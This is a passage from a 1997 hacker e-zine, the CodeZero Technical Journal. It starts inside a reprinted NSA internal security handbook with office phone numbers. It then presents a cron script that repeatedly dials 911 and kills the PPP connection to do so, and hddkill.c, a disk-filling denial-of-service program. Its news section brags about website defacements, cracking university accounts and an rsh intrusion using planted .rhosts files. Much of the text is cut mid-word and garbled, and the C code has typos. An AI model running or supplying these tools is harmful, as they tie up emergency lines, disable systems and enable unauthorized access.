absence of an Access Control Terminal, or when passing an internal security checkpoint, the badge should be held up for viewing by a Security Protective Officer. The badge must be displayed at all times while the individual remains within any NSA installation. NSA Badges must be clipped to a beaded neck chain. If necessary for the safety of those working in the area of electrical equipment or machinery, rubber tubing may be used to insulate the badge chain. For those Agency personnel working in proximity to other machinery or equipment, the clip may be used to attach the badge to the wearer's clothing, but it must also remain attached to the chain. After you leave an NSA installation, remove your badge from public view, thus avoiding publicizing your NSA affiliation. Your badge should be kept in a safe place which is convenient enough to ensure that you will be reminded to bring it with you to work. A good rule of thumb is to afford your badge the same protection Visitor Control Center which services your facility. Should you lose your badge, you must report the facts and circumstances immediately to the Security Operations Center (SOC) (963-3371s/688-6911b) so that your badge PIN can be deactivated in the Access Control Terminals. In the event that you forget your badge when reporting for duty, you may obtain a "non-retention" Temporary Badge at the main Visitor Control Center which serves your facility after a co-worker personally identifies your and your clearance has been verified. Your badge is to be used as identification only within NSA facilities or other government installations where the NSA badge is recognized. Your badge should never be used outside of the NSA or other government facilities for the purpose of personal identification. You should obtain a Department of Defense identification card from the Civilian Welfare Fund (CWF) if you need to identify ng for "government discounts" offered at various commercial establishments. Your badge color indicates your particular affiliation with NSA and your level of clearance. Listed below are explanations of the badge colors you are most likely to see: Green (*) Fully cleared NSA employees and certain military assignees. Orange (*) (or Gold) Fully cleared representative of other government agencies. Black (*) Fully cleared contractors or consultants. Blue Employees who are cleared to the SECRET level while awaiting completion of their processing for full (TS/SI) clearance. These Limited Interim Clearance (LIC) employees are restricted to certain activities while inside a secure area. Red Clearance level is not specified, so assume the holder is uncleared. * - Fully cleared status means that the person has been cleared to the Top Secret (TS) level and indoctrinated for Special Intelligence (SI). All badges with solid color backgrounds (permanent badges) are kept by individuals until their NSA employment or assignment ends. Striped badges ("non-retention" badges) are generally issued to visitors and are returned to the Security Protective Officer upon departure from an NSA faciations there are generally two types of areas, Administrative and Secure. An Administrative Area is one in which storage of classified information is not authorized, and in which discussions of a classified nature are forbidden. This type of area would include the corridors, restrooms, cafeterias, visitor control areas, credit union, barber shop, and drugstore. Since uncleared, non-NSA personnel are often present in these areas, all Agency personnel must ensure that no classified information is discussed in an Administrative Area. Classified information being transported within Agency facilities must be placed within envelopes, folders, briefcases, etc. to ensure that its contents or classification markings are not disclosed to unauthorized persons, or that materials are not inadvertently dropped enroute. The normal operational work spaces within an NSA facility are designated Secure Areas. These areas are approved for classified discussions and for the storage of classified material. Escorts must be provided if it is necessary for uncleared personnel (repairmen, etc.) to enter Secure Areas, an all personnel within the areas must be made aware of the presence of uncleared individuals. All unknown, unescorted visitors to Secure Areas should be immediately challenged by the personnel within the area, regardless of the visitors' clearance level (as indicated by their badge color). The corridor doors of these areas must be locked with a deadbolt and all classified information in the area must be properly secured after normal working hours or whenever the area is unoccupied. When storing classified material, the most sensitive material must be stored in the most secure containers. Deadbolt keys for doors to these areas must be returned to the key desk at the end of the workday. For further information regarding Secure Areas, consult the Physical Security Division (M51) or your staff Security Officer. Items Treated As Classified For purposes of transportation, storage and destruction, there are certain types of items which must be treated as classified even though they may not contain classified information. Such items include carbon paper, vu-graphs, punched machine processing cards, punched paper tape, magnetic tape, computer floppy disks, film, and used typewriter ribbons. This special treatment is necessary since a visual examination does not readily reveal whether the items contain classified information. Prohibited Items Because of the potential security or safety hazards, certain items are prohibited under normal circumstances from being brought into or removed from any NSA installation. These items have been groped into two general classes. Class I prohibited items are those which constitute a threat to the saacilities. Items in this category include: a. Firearms and ammunition b. Explosives, incendiary substances, radioactive materials, highly volatile materials, or other hazardous materials c. Contraband or other illegal substances d. Personally owned photographic or electronic equipment including microcomputers, reproduction or recording devices, televisions or radios. Prescribed electronic medical equipment is normally not prohibited, but requires coordination with the Physical Security Division (M51) prior to being brought into any NSA building. Class II prohibited items are those owned by the government or contractors which constitute a threat to physical, technical, or TEMPEST security. Approval by designated organizational officials is required before these items can be brought into or removed from NSA facilities. Examples are: a. Transmitting and receiving equipment b. Recording equipment and media c. Telephone equipment and attachments d. Computing devices and terminals e. Photographic equipment and film A more detailed listing of examples of Prohibited Items may be obtained from your Staff Security Officer or the Physical Security Division (M51). Additionally, you mas are also restricted and should not be brought into any NSA facility. Some of these items pose a technical threat; others must be treated as restricted since a visual inspection does not readily reveal whether they are classified. These items include: a. Negatives from processed film; slides; vu-graphs b. Magnetic media such as floppy disks, cassette tapes, and VCR videotapes c. Remote control devices for telephone answering machines d. Pagers Exit Inspection As you depart NSA facilities, you will note another physical security safeguard--the inspection of the materials you are carrying. This inspection of your materials, conducted by Security Protective Officers, is designed to preclude the inadvertent removal of classified material. It is limited to any articles that you are carrying out of the facility and maotebooks, magazines, gym bags, and other such items. Although this practice may involve some inconvenience, it is conducted in your best interest, as well as being a sound security practice. The inconvenience can be considerably reduced if you keep to a minimum the number of personal articles that you remove from the Agency. Removal Of Material From NSA Spaces The Agency maintains strict controls regarding the removal of material from its installations, particularly in the case of classified material. Only under a very limited and official circumstances classified material be removed from Agency spaces. When deemed necessary, specific authorization is required to permit an individual to hand carry classified material out of an NSA building to another Secure Area. Depending on the material and circumstances involved, there are several ways to accomplish this. A Courier Badge authorizes the wearer, for official purposes, to transport classified material, magnetic media, or Class II prohibited items between NSA facilities. These badges, which are strictly controlled, are made available by the Physical Security Division (M51) only to those offices which have specific requirements justifying their use. An Annual Security Pass may be issued to individuals whose official duties require that they transport printed classified materials, information storage media, or Class II prohibited items to secure locations within the local area. Materials carried by an individual who displays this pass are subject to spot inspection by Security Protective Officers or other personnel from the Office of Security. It is not permissible to use an Annual Security Pass for personal convenience to circumvent inspection of your personal property by perimeter Security Protective Officers. If you do not have access to a Courier Badge and you have not been issued an Annual Security Pass, you may obtain a One-Time Security Pass to remove classified materials/magnetic media or admit or remove prohibited items from an NSA installation. These passes may be obtained from designated personnel in your work element who have been given authority to issue them. The issuing official must also contact the Security Operations Center (SOC) to obtain approval for the admission or removal of a Class I prohibited item. When there is an official need to remove government property which is not magnetic media, or a prohibited or classified item, a One-Time Property Pass is used. This type of pass (which is not a Security Pass) may be obtained from your element custodial property officer. A Propual is removing personal property which might be reasonably be mistaken for unclassified Government property. This pass is surrendered to the Security Protective Officer at the post where the material is being removed. Use of this pass does not preclude inspection of the item at the perimeter control point by the Security Protective Officer or Security professionals to ensure that the pass is being used correctly. External Protection Of Classified Information On those occasions when an individual must personally transport classified material between locations outside of NSA facilities, the individual who is acting as the courier must ensure that the material receives adequate protection. Protective measures must include double wrapping and packaging of classified information, keeping the material under constant control, ensuring the presence of a second appropriately cleared person when necessary, and delivering the material to authorized persons only. If you are designated as a courier outside the local area, contact the Security Awareness Division (M56) for your courier briefing. Even more basic than these procedures is the individual security responsibility to confine classified conversations to secure areas. Your home, car pool, and public places are not authorized areas to conduct classified discussions--even if everyone involved in he discussion possesses a proper clearance and "need-to-know." The possibility that a conversation could be overheard by unauthorized persons dictates the need to guard against classified discussions in non-secure areas. Classified information acquired during the course of your career or assignment to NSA may not be mentioned directly, indirectly, or by suggestion in personal diaries, records, or memoirs. Reporting Loss Or Disclosure Of Classified Information The extraordinary sensitivity of the NSA mission requires the prompt reporting of any known, suspected, or possible unauthorized disclosure of classified information, or the discovery that classified information may be lost, or is not being afforded proper protection. Any information coming to your attention concerning the loss or unauthorized disclosure of classified information should be reported immediately to your supervisor, your Staff Security Officer, or the Security Operations Center (SOC). Use Of Secure And Non-Secure Telephones Two separate telephone systems have been installed in NSA facilities for use in the conduct of official Agency business: the secure telephone system (gray telephone) and the outside, non-secure telephone system (black telephone). All NSA personnel must ensure that use of either telephone system does not jeopardize the security of classified information. The secure telephone system is authorized for discussion of classified information. Personnel receiving calls on the secure telephone may assume that the caller is authorized to use the system. However, you must ensure that the caller has a "need-to-know" the information you will be discussing. The outside telephone system is only authorized for unclassified official Agency business calls. The discussion of classified information is not permitted on this system. Do not attempt to use "double-talk" in order to discuss classified information over the non-secure telephone system. In order to guard against the inadvertent transmission of classified information over a non-secure telephone, and individual using the black telephone in an area where classified activities are being conducted must caution other personnel in the area that the non-secure telephone is in use. Likewise, you should avoid using the non-secure telephone in the vicinity of a secure telephone which is also in use. HELPFUL INFORMATION Security Resources In the fulfillment of your security responsibilities, you should be aware that there are many resources available to assist you. If you have any questions or concerns regarding security at NSA or your individual security responsibilities, your supervisor should be consulted. Additionally, Staff Security Officers are appointed to the designated Agency elements to assist these organizations in carrying out their security responsibilities. There is a Staff Security Officer assigned to each organization; their phone numbers are listed at the back of this handbook. Staff Security Officers also provide guidance to and monitor the activities of Security Coordinators and Advisors (individuals who, in addition to their operational duties within their respective elements, assist element supervisors or managers in discharging security responsibilities). Within the Office of Security, the Physical Security Division (M51) will offer you assistance in matters such as access control, security passes, clearance verification, combination locks, keys, identification badges, technical security, and the Security Protective Force. The Security Awareness Division (M56) provides security guidance and briefings regarding unofficial foreign travel, couriers, special access, TDY/PCS, and amateur radio activities. The Industrial and Field Security Division (M52) is available to provide security guidance concerning NSA contractor and field site matters. The Security Operations Center (SOC) is operated by two Security Duty Officers (SDOs), 24 hours a day, 7 days a week. The SDO, representing the Office of Security, provides a complete range of security services to include direct communications with fire and rescue personnel for all Agency area facilities. The SDO is available to handle any physical or personnel problems that may arise, and if necessary, can direct your to the appropriate security office that can assist you. After normal business hours, weekends, and holidays, the SOC is the focal point for all security matters for all Agency personnel and facilities (to include Agency field sites and contractors). The SOC is located in Room 2A0120, OPS 2A building and the phone numbers are 688-6911(b), 963-3371(s). However, keep in mind thsion within the Office of Security directly. Do not hesitate to report any information which may affect the security of the Agency's mission, information, facilities or personnel. Security-Related Services In addition to Office of Security resources, there are a number of professional, security-related services available for assistance in answering your questions or providing the services which you require. The Installations and Logistics Organization (L) maintains the system for the collection and destruction of classified waste, and is also responsible for the movement and scheduling of material via NSA couriers and the Defense Courier Service (DCS). Additionally, L monitors the proper addressing, marking, and packaging of classified material being transmitted outside of NSA; maintains records pertaining to receipt and transmission of controlled mail; and issues property passes for the removal of unclassified property. The NSA Office of Medical Services (M7) has a staff of physicians, clinical psychologists and an alcoholism counselor. All are well trained to help individuals help themselves in dealing with their problems. Counseling services, with referrals to private mental health professionals when appropriate, are all available to NSA personnel. Appointments can be obtained by contacting M7 directly. When an individual refers himself/herself, the information discussed in the counseling sessions is regarded as privileged medical information and is retained exclusively in M7 unless it pertains to the national security. Counselling interviews are conducted by the Office of Civilian Personnel (M3) with any civilian employee regarding both on and off-the-job problems. M3 is also available to assist all personnel with the personal problems seriously affecting themselves or members of their families. In cases of serious physical or emotional illness, inrgencies, M3 informs concerned Agency elements and maintains liaison with family members in order to provide possible assistance. Similar counselling services are available to military assignees through Military Personnel (M2). GUIDE TO SECURITY M51 PHYSICAL SECURITY 963-6651s/688-8293b (FMHQ) 968-8101s/859-6411b (FANX) CONFIRM and badges Prohibited Items (963-6611s/688-7411b) Locks, keys, safes and alarms SOC (963-3371s/688-6911b) Security/vehicle passes NSA facility protection and compliance Visitor Control Inspections Red/blue seal areas New Construction Pass Clearances (963-4780s/688-6759b) M52 INDUSTRIAL AND FIELD SECURITY 982-7918s/859-6255b Security at contractor field site facilities Verification of classified mailing addresses for contractor facilities M53 INVESTIGATIONS 982-7914s/859-6464b Personnel Interview Program (PIP) Reinvestigations Military Interview Program (MIP) Special investigations M54 COUNTERINTELLIGENCE 982-7832s/859-6424b Security counterintelligence analysis Security compromises M55 CLEARANCES 982-7900s/859-4747b Privac/688-6535b Security indoctrinations/debriefings Embassy visits Associations with foreign nationals Briefings (foreign travel, Security Week ham radio, courier, Security posters, brochures, etc. LIC, PCS, TDY, special access, etc.) Foreign travel approval Military contractor orientation Special Access Office (963-5466s/688-6353b) M57 POLYGRAPH 982-7844s/859-6363b Polygraph interviews M509 MANAGEMENT AND POLICY STAFF 982-7885s/859-6350b STAFF SECURITY OFFICERS (SSOs) Element Room Secure/Non-Secure A 2A0852B 963-4650/688-7044 B 3W099 963-4559/688-7141 D/Q/J/N/U 2B8066G 963-4496/688-6614 E/M D3B17 968-8050/859-6669 G 9A195 963-5033/688-7902 K 2B5136 963-1978/688-5052 L SAB4 977-7230/688-6194 P 2W091 963-5302/688-7303 R B6B710 968-4073/859-4736 S/V/Y/C/X C2A55 972-2144/688-7549 T 2B5040 963-4543/688-7364 W 1C181 963-5970/688-7061 GUIDE TO SECURITY-RELATED SERVICES Agenc859-4381 Alcohol Rehabilitation Program 963-5420/688-7312 Cipher Lock Repair 963-1221/688-7119 Courier Schedules (local) 977-7197/688-7403 Defense Courier Service 977-7117/688-7826 Disposal of Classified Waste - Paper only 972-2150/688-6593 - Plastics, Metal, Film, etc 963-4103/688-7062 Locksmith 963-3585/688-7233 Mail Dissemination and Packaging 977-7117/688-7826 Medical Center (Fort Meade) 963-5429/688-7263 (FANX) 968-8960/859-6667 (Airport Square) 982-7800/859-6155 NSA/CSS Information Policy Division 963-5825/688-6527 Personnel Assistance - Civilian 982-7835/859-6577 - Air Force 963-3239/688-7980 - Army 963-3739/688-6393 - Navy 963-3439/688-7325 Property Passes (unclassified material) 977-7263/688-7800 Psychological Services 963-5429/688-7311 FREQUENTLY USED ACRONYMS/DESIGNATORS ARFCOS Armed Forces Courier Service (now known as DCS) AWOL Absent Without Leave CAO Classification Advisory Officer COB Close of Business CWF Civilian Welfare Fund DCS Defense Courier Service (formerly known as ARFCOS) DoD Department of Defense EOD Enter on Duty FOUO For Official Use Only M2 Office of Military Personnel M3 Office of Civilian Personnel M5 Office of Security M7 Office of Medical Services NCS National Cryptologic School PCS Permanent Change of Station PIN Personal Identification Number Q43 Information Policy Division SDO Security Duty Officer SOC Security Operations Center SPO Security Protective Officer SSO Staff Security Officer TDY Temporary Duty UFT Unofficial Foreign Travel A FINAL NOTE The information you have just read is designed to serve as a guide to assist you in the conduct of your security responsibilities. However, it by no means describes the extent of your obligation to protect information vital to the defense of our nation. Your knowledge of specific security regulations is part of a continuing process of education and experience. This handbook is designed to provide the foundation of this knowledge and serve as a guide to the development of an attitude of security awareness. In the final analysis, security is an individual responsibility. As a participant in the activities of the National Security Agency organization, you are urged to be always mindful of the importance of the work being accomplished by NSA and of the unique sensitivity of the Agency's operations. ─────────────────────────────────────────────────────────────────────────────── 8. 911 Autodialer Script : The CodeZero Crew. ─────────────────────────────────────────────────────────────────────────────── #!/bin/sh # 911-autodial.sh # # for use with linux boxes running DIP. # dials 911 every ten minutes, and if the user is using pppd # it kills pppd in order to place the call. # IMPORTANT!!! # add this line to root's crontab with: crontab -e root # 2,12,22,32,42,52 * * * * /path/to/911-autodial.sh # note: this assumes the modem device is: /dev/modem # if it is otherwise change "port modem" to # "port cua1" or whatever the modem device is # although it is usally /dev/modem. echo " get $local 0.0.0.0" >> /tmp/911.dip echo " get $remote 0.0.0.0" >> /tmp/911.dip echo " port modem" >> /tmp/911.dip echo " speed 38400" >> /tmp/911.dip echo " reset" >> /tmp/911.dip echo " send ATQ0V1E1X4\r" >> /tmp/911.dip echo " wait OK 2" >> /tmp/911.dip echo " dial 911" >> /tmp/911.dip ps grep "^root" /tmp/ppp-check > /dev/null 2>&1 if [ $? -ne 0 ] ; then echo "PPP IS DEAD" > /tmp/ppp-dead fi if [ -f /tmp/ppp-dead ]; then /sbin/dip /tmp/911 rm /tmp/ppp-* rm /tmp/911.dip exit 1 fi kill `ps -ax|grep pppd|grep -v grep|awk 'BEGIN {FS=" ";OFS=" "} {print $1}` /sbin/dip /tmp/911 rm /tmp/ppp-* rm /tmp/911.dip exit 1 ─────────────────────────────────────────────────────────────────────────────── 9. Common Ports List : Tetsu Khan ─────────────────────────────────────────────────────────────────────────────── Program / Name Port ──────────────────────────────── kerberos 750 montior 561 rmontior 560 netwall 533 ntalk 518 ktalk 517 pkill 515 login 513 execk 512 newsk 144 nntp 119 link 87 chargen 19 bootp 67 rlp 39 netstat 15 discard 9 telnetd 23 ftp 21 smtp 25 pop3 110 identd 113 fingerk 79 http 80 / 8080 military http 80 / 8080 / 5580 ─────────────────────────────────────────────────────────────────────────────── 10.Denial Of Service (DOS) Attack 001 : hddkill.c : Testu Khan ─────────────────────────────────────────────────────────────────────────────── This program below, called hddkill.c, does what the name, says, fills up the hard drive of the target, this will work well if the target is up 24/7 as the file that the program creates is alwastings or whereis or find, after a while the hard drive will be full and none of the users will be able to write to it until the program is deleted. filename: hddkill.c #include <stdio.h> #include <stdlib.h> main() { int ifd; chat buf[8192]; ifd= open("./attack", O_WRITE| O_CREAT, 0777); unlink("/.attack"); while(1) write(ifd,buf, sizeof9buf)); } One way to get this to work faster, is to add a fork() call in the program, thus making it run multiple copies, and filling up the drive faster. ─────────────────────────────────────────────────────────────────────────────── 11.CodeZero World News : Mr.fr1day ─────────────────────────────────────────────────────────────────────────────── ELH think they have Death Veggie as vice! ----------------------------------------- New group on the scene called ELH (Elite Hack Legion), they have around 5 members, LordNemesis, VooDooHex and some others, including a 'wannabe' by the name of DeathVege... I was first told of this by my friend Zophar, who had joined ELH so he could hook up with DeathVege and then the cDc... So my colleague so1o hunted DeathVege down, and logged this... Session Start: Sat Mar 08 20:53:43 1997 * Logging Chat with DeathVege to: [DeathVege.log] <so1o> hey man <DeathVege> hi <so1o> can i ask you a few questions? <DeathVege> shure. <so1o> can you tell me who the owner of the L0phT is? <so1o> hello?! <so1o> yew there? <DeathVege> Why? <so1o> simple question <DeathVege> I dunno, <DeathVege> Ask Lord Nemesis. <so1o> "is this the real deth veggie" test <so1o> thats all <DeathVege> No I am his student. <so1o> okay <so1o> define bash <DeathVege> In html or script or jarggon? <so1o> posix <DeathVege> I don't work in posix <so1o> really/ <so1o> what do ? <DeathVege> hold on. <so1o> okie <so1o> tell me what port sendmail uses <so1o> tell me what tcp/ip stands for <DeathVege> You ask too many questions. <so1o> why? <so1o> your not lame are you? <so1o> like the rest of elh <so1o> ? -> [DeathVege] VERSION <DeathVege> SO you think ELH members are lame? <so1o> define bash <so1o> that is A SIMPLE question <DeathVege> answer me. <so1o> that a r you <DeathVege> no you answer me now. <so1o> no <so1o> you answer me now <so1o> imposter <so1o> im gonna mail veggie <so1o> and give him your ip, and this log <so1o> lame fuck Session Close: Sat Mar 08 21:01:29 1997 DeathVege's Lameass username / ip : ~Jeff@user-168-121-28-31.dialup.mindspring.com You can view the ELH (Extremely Lame Hackers) website at : http://www.ilf.net/elh/ ─────────────────────────────────────────────────────────────────────────────── -=x9=- and ELH and CyberToast To Merge! --------------------------------------- Extemely Lame Hackers, -=x9=- (too much like 9x methinks) and CyberToast are in the process of merging, i d0nut gn0 why, cos they're all lamers, and they have no clues, if you see them, ask them what sendmail is :D So now they hang on irc.dal.net at #-=hex=- and they are fun to laugh at. http://www.ilf.net/cybertoast/ http://www.ilf.net/-=x9=-/ http://www.ilf.net/elh/ ─────────────────────────────────────────────────────────────────────────────── Zophar and od^phreak hack ELH and CyberToasts websites :) --------------------------------------------------------- After realising how lame ELH really are, Zophar decided to give them a little pay back, and so himself and od^phreak hacked www.ilf.net and ripped the fuck out of ELH and CyberToasts lameass webpages, after all, what comes around goes around, those punks had it coming to them... ─────────────────────────────────────────────────────────────────────────────── CyberKings get arrested. ------------------------ There are some rumours going around, that members of the secretive group known as the CyberKings have been arrested, the CyberKings are based heavily around Europe, with some US and Asian links. ─────────────────────────────────────────────────────────────────────────────── Project. -------- Deprave, Acid Angel, BroncBuster and a few others are working heavily on a big project, more news s00n. ─────────────────────────────────────────────────────────────────────────────── gitm back for g00d? ------------------- gitm (Ghost In The Machine), editor of the "Time For A Change" e-zine, has been sighted back on the scene, last seen in #hack, will he be back for g00d? ─────────────────────────────────────────────────────────────────────────────── Warez-Kiddies with bots take #hack. ----------------------------------- a couple of lame punks with eggbots took over #hack for about 2 hours, the lamest fuck was Z|GMA4!zigma4@zigma4.demon.co.uk , if you see him, tell him if he ever comes near #hack we will have to kill the demon routers again. ─────────────────────────────────────────────────────────────────────────────── Digital Darkness BBS Down F0r G00d? ----------------------------------- omnicolor, aka The Smiling Bandit wrote : Digital Darkness BBS has gone down for good. I was having modem problems, and just as I got that fixed, all the files disappeared. The directory tree was still there, but all the files that run the board were deleted. I tried undelete, but there were too many files, and I was supposed to remember the first letter of every file. So I just got rid of the whole thing. I'll be putting a new one up eventually, maybe after I go to college. ─────────────────────────────────────────────────────────────────────────────── AWOL News. ---------- AWOL, the [A]nnihialation of [W]indoze [O]perators [L]td. Based in the UK, Now has a 4 storey, 200 roomed building, p-150 / 32mb ram / 1.4gb / 33.6 laptop (with added biohazard sticker), 2 phone lines, and a bigger system on the way, Member List : Wild_fiRe - phreaker, set up all the fone lines BoMbJaCk - general systems specialist Tokyo_Joe - Solaris specialist Jester - phreaker. Grandpa - electronics expert, builds boxes etc. ─────────────────────────────────────────────────────────────────────────────── Solaris 2.6 source coming this way s00n. ---------------------------------------- so1o, WayHigh, Fiji, mstrhelix, Sciri and TRON and a few others will have the solaris 2.6 source soon, and so expect 2.6 e─────────────────────────────────────────────────────────────────────────── Who owns altair.herts.ac.uk ? ----------------------------- so1o and TheCa have been basically giving away altair.herts.ac.uk shells for altair.herts.ac.uk , due to the slowness and 250kb quotas enforced, these shells are basically useless, unless you have root access :) There are 10,000 users on the altair /etc/passwd , but l/p's are not global like for sirius.herts.ac.uk, anyway, so1o claims to have cracked a good 400 of them, and TheCa changed the /etc/motd so it said some shit about him owning it etc. etc. I now estimate that every shells trader that uses IRC has an altair.herts.ac.uk shell, and altair has a compiler, so I imagine quite a few people 'own' it. ─────────────────────────────────────────────────────────────────────────────── so1o kills lameass haqr. ------------------------ casino.cchs.usyd.edu.au was to be the battle ground, another hacker had messed with so1o and cracked one of the 50 accounts (so1o has passwds for all 50 bar root/sysdiag/sundiag, which always changes) then logged in, changed the passwd and started to d/l an eggbot onto the system thru ftp (ps -a showed this), so1o could not login thru telnet and kill this user, who was not masking or anything and seemed quite clueless, so he remembered that although he had no super user accounts, he placed .rhosts in ALL the users accounts he ever logged onto, so so1o exited... ------------------------------------------------------------------------------- $ rsh -l FOwww casino.cchs.usyd.edu.au csh -i no control to this tty blah blah blah... % who FOwww tty1 (ad134-43.compuserve.com) %write FOwww tty1 EyE WiLL bE w00pIn YeR aSs f00L, D0nuT Be mEsSiN WiT Me! EyE WiLL bE w00pIn YeR aSs f00L, D0nuT Be mEsSiN WiT Me! EyE WiLL bE w00pIn YeR aSs f00L, D0nuT Be mEsSiN WiT Me! EyE WiLL bE w00pIn YeR aSs f00L, D0nuT Be mEsSiN WiT Me! ^C % ps -x PID TTY NOTES(?) ---------------------- 8144 1 ftp ftp.cdrom.com 8132 1 -bash % write FOwww ttkill -9 8132 % who % % so1o wins, fatality... so1o : command not found. % exit Logout Connection Closed. $ ------------------------------------------------------------------------------- umm, i suppose thats it now, until next month! mr.fr1day ─────────────────────────────────────────────────────────────────────────────── 12.News Conclusion : Tetsu Khan ─────────────────────────────────────────────────────────────────────────────── Well, ELH and -=x9=- and CyberToast are a bunch of lame fucks, DeathVege at ELH needs a good kicking, Zophar and od^phreak gave them a good beating by taking their lameass webistes out, just keep up the good work! oh yeah, one last thing, goto http://ilf.net/hemp/ and d/l a copy of KRACK then read it and try to guess the ages of the authors :D T_K ─────────────────────────────────────────────────────────────────────────────── ╒══════════════════════════════════════════════════════════════════╕ │ The CodeZero Technical Journal, March 1997, Issue 001 │▒ └──────────────────────────────────────────────────────────────────┘▒ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ ─────────────────────────────────────────────────────────────────────────────── "I'm The FireStarter, Twisted FireStarter!" Tetsu Khan, CodeZero. ───────────────────────────────────────────────────────────────────────────────